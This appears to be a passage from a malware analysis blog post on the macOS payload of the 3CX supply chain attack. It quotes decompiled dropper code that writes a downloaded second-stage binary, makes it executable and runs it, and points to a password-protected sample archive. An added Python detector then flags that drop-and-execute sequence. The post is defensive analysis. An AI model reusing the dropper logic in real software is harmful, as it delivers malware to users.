Everyday is lazarus.dayβ

Ironing out (the macOS) details of a Smooth Operator (Part II)

2023-04-01, Objective-see
#SupplyChain #3CXDesktopApp #SmoothOperator #macOS


As “Sharing is Caring” I’ve uploaded the malicious binary UpdateAgent to our public macOS malware collection. The password is: infect3d
Earlier this week, I published a blog post that added a missing puzzle piece to the 3CX supply chain attack (attributed to the North Koreans, aka the Lazarus Group).
In that post, we uncovered the trojanized component of the macOS variant of the attack, comprehensively analyzed it, and provided IoCs for detection. I’d recommend reading that write-up, as this post, part II, continues from where that left off.
We ended the previous post noting that the main goal of the 1st-stage payload (libffmpeg.dylib) was to download and execute a 2nd-stage payload named UpdateAgent. The following snippet of annotated decompiled code, from the 1st-stage payload, shows this logic:
//write out 2nd-stage payload "UpdateAgent"
//which was just downloaded from the attacker's server
stream = fopen(path2UpdateAgent, "wb");
fwrite(bytes, length, 0x1, stream);
fflush(stream);
fclose(stream);

//make +x
chmod(path2UpdateAgent, 755);

//execute …
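The snippet above is a textbook drop-and-execute sequence: write a file, mark it executable, run it. The following is an added detection example (my own code, not from the original post or from the 3CX/Lazarus samples): it walks a list of simplified, constructed endpoint events and flags any process that writes a path, chmods it with an execute bit, and then execs that same path within a short window. The event schema, the process IDs, the paths (including the "/PLACEHOLDER/UpdateAgent" stand-in for the real drop location) and the time window are all assumptions made for the example; real telemetry (e.g. from Endpoint Security) would need to be mapped onto these fields.

```python
"""Flag the write -> chmod(+x) -> exec sequence a dropper like the 1st-stage
payload performs.  Works on constructed, simplified endpoint events; it is not
a parser for any real endpoint-security log format."""
import stat
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass
class Event:
    """One simplified endpoint event (constructed for this example)."""
    ts: float        # seconds since boot
    pid: int         # process performing the operation
    op: str          # "write", "chmod" or "exec"
    path: str        # file the operation targets
    mode: int = 0    # chmod only: the mode argument as passed to chmod(2)


EXEC_BITS = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH


def sets_exec_bit(mode: int) -> bool:
    """True if the requested mode contains any execute bit.

    The decompiled snippet passes the literal 755.  Decompilers print constants
    in decimal, and 755 decimal is 0o1363; its owner triplet (3 = -wx) still
    contains the execute bit, so this check fires for 755 and for 0o755 alike.
    """
    return bool(mode & EXEC_BITS)


def find_drop_and_exec(events: List[Event], window: float = 120.0) -> List[Tuple[int, str, float]]:
    """Return (pid, path, exec_ts) for every path that one process wrote, made
    executable, and then executed, all within `window` seconds of the write."""
    written: Dict[Tuple[int, str], float] = {}    # (pid, path) -> write time
    chmodded: Dict[Tuple[int, str], float] = {}   # (pid, path) -> chmod(+x) time
    hits: List[Tuple[int, str, float]] = []

    for ev in sorted(events, key=lambda e: e.ts):
        key = (ev.pid, ev.path)
        if ev.op == "write":
            written[key] = ev.ts
            chmodded.pop(key, None)          # a fresh write restarts the sequence
        elif ev.op == "chmod":
            if key in written and sets_exec_bit(ev.mode) and ev.ts - written[key] <= window:
                chmodded[key] = ev.ts
        elif ev.op == "exec":
            if key in chmodded and ev.ts - written[key] <= window:
                hits.append((ev.pid, ev.path, ev.ts))
                written.pop(key, None)
                chmodded.pop(key, None)
    return hits


# Constructed sample events: one malicious sequence plus three benign look-alikes.
SAMPLE_EVENTS = [
    # the dropper: write, chmod with the snippet's literal 755, exec (hypothetical pid/path)
    Event(10.0, 4242, "write", "/PLACEHOLDER/UpdateAgent"),
    Event(10.1, 4242, "chmod", "/PLACEHOLDER/UpdateAgent", mode=755),
    Event(10.2, 4242, "exec",  "/PLACEHOLDER/UpdateAgent"),
    # benign: a build tool writes and chmods an output binary but never executes it
    Event(20.0, 5001, "write", "/tmp/build/out"),
    Event(20.5, 5001, "chmod", "/tmp/build/out", mode=0o755),
    # benign: chmod without any execute bit, so a later exec is not the pattern
    Event(30.0, 6002, "write", "/tmp/notes.txt"),
    Event(30.1, 6002, "chmod", "/tmp/notes.txt", mode=0o644),
    Event(30.2, 6002, "exec",  "/tmp/notes.txt"),
    # benign: the chmod and exec happen far outside the window
    Event(40.0, 7003, "write", "/tmp/later"),
    Event(400.0, 7003, "chmod", "/tmp/later", mode=0o755),
    Event(400.1, 7003, "exec",  "/tmp/later"),
]


if __name__ == "__main__":
    for pid, path, ts in find_drop_and_exec(SAMPLE_EVENTS):
        print(f"drop-and-exec: pid={pid} path={path} exec_ts={ts}")
```

The window keeps installers and build systems, which routinely write and chmod binaries, from matching unless they also execute the fresh file promptly from the same process; tuning that window, and deciding whether to also follow child processes, is where a real deployment would spend its effort.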